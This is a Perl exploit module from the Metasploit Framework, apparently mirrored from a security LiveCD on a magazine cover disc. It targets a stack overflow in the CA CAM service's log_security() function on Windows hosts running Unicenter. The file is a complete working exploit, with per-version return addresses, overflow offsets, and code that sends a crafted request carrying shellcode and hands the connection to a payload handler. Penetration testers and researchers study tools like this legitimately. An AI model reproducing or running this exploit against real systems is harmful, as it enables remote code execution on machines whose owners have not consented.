home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / cacam_logsecurity_win32.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  120 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::cacam_logsecurity_win32;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.     'Name'     => 'CA CAM log_security() Stack Overflow (Win32)',
  20.     'Version'  => '$Revision: 1.1 $',
  21.     'Authors'  => [ 'H D Moore <hdm [at] metasploit.com>' ],
  22.     'Arch'     => [ 'x86' ],
  23.     'OS'       => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
  24.     'Priv'     => 1,
  25.     'AutoOpts' => { 'EXITFUNC' => 'process' },
  26.  
  27.     'UserOpts' =>
  28.       {
  29.         'RHOST' => [1, 'ADDR', 'The target address'],
  30.         'RPORT' => [1, 'PORT', 'The target port', 4105],
  31.       },
  32.  
  33.     'Payload' =>
  34.       {
  35.         'Space'     => 1024,
  36.         'BadChars'  => "\x00",
  37.         'Prepend'   => "\x81\xc4\x54\xf2\xff\xff",    # add esp, -3500
  38.         'Keys'        => ['+ws2ord'],
  39.       },
  40.  
  41.     'Description'  => Pex::Text::Freeform(qq{
  42.         This module exploits a vulnerability in the CA CAM service by passing
  43.         a long parameter to the log_security() function. The CAM service is part
  44.         of TNG Unicenter. This module has been tested on Unicenter v3.1.
  45. }),
  46.  
  47.     'Refs'    =>
  48.       [
  49.     
  50.       ],
  51.  
  52.     'DefaultTarget' => 0,
  53.     'Targets' =>
  54.       [      
  55.           # W2API.DLL @ 0x01950000 - return to ESI
  56.         # $Header: /home/mscvs/framework/exploits/cacam_logsecurity_win32.pm,v 1.1 2005/10/15 14:13:50 hdm Exp $
  57.         ['W2API.DLL TNG 2.3', 0x01951107], 
  58.         
  59.         # return to ESI in ws2help.dll
  60.         ['Windows 2000 SP0-SP4 English', 0x750217ae],
  61.         ['Windows XP SP0-SP1 English',   0x71aa16e5],
  62.         ['Windows XP SP2 English',       0x71aa1b22],
  63.         ['Windows 2003 SP0 English',     0x71bf175f],
  64.       ],
  65.  
  66.     'Keys'    => ['cam'],
  67.   };
  68.  
  69. sub new {
  70.     my $class = shift;
  71.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  72.     return($self);
  73. }
  74.  
  75. sub Exploit {
  76.     my $self = shift;
  77.     my $target_host = $self->GetVar('RHOST');
  78.     my $target_port = $self->GetVar('RPORT');
  79.     my $target_idx  = $self->GetVar('TARGET');
  80.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  81.     my $target = $self->Targets->[$target_idx];
  82.  
  83.     $self->PrintLine("[*] Attempting to exploit target " . $target->[0]);
  84.  
  85.  
  86.     my $s = Msf::Socket::Tcp->new
  87.       (
  88.         'PeerAddr'  => $target_host,
  89.         'PeerPort'  => $target_port,
  90.       );
  91.  
  92.     if ($s->IsError) {
  93.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  94.         return;
  95.     }
  96.  
  97.     my $pattern = Pex::Text::EnglishText(4096);
  98.  
  99.     # Offset 1016 for EIP, 1024 = ESP, 1052 = ESI
  100.     substr($pattern, 1016, 4, pack('V', $target->[1]));
  101.     substr($pattern, 1052, length($shellcode), $shellcode);
  102.  
  103.     my $req =
  104.         "\xfa\xf9\x00\x10" . $pattern . "\x00";
  105.  
  106.     my $ack = $s->Recv(4, 5);
  107.     if ($ack ne "ACK\x00") {
  108.         $self->PrintLine("[*] The CAM service is not responding.");
  109.         return;
  110.     }
  111.     $s->Send($req);
  112.     $s->Recv(-1,1);
  113.     $self->Handler($s);
  114.     $s->Close();
  115.  
  116.     return;
  117. }
  118.  
  119. 1;
  120.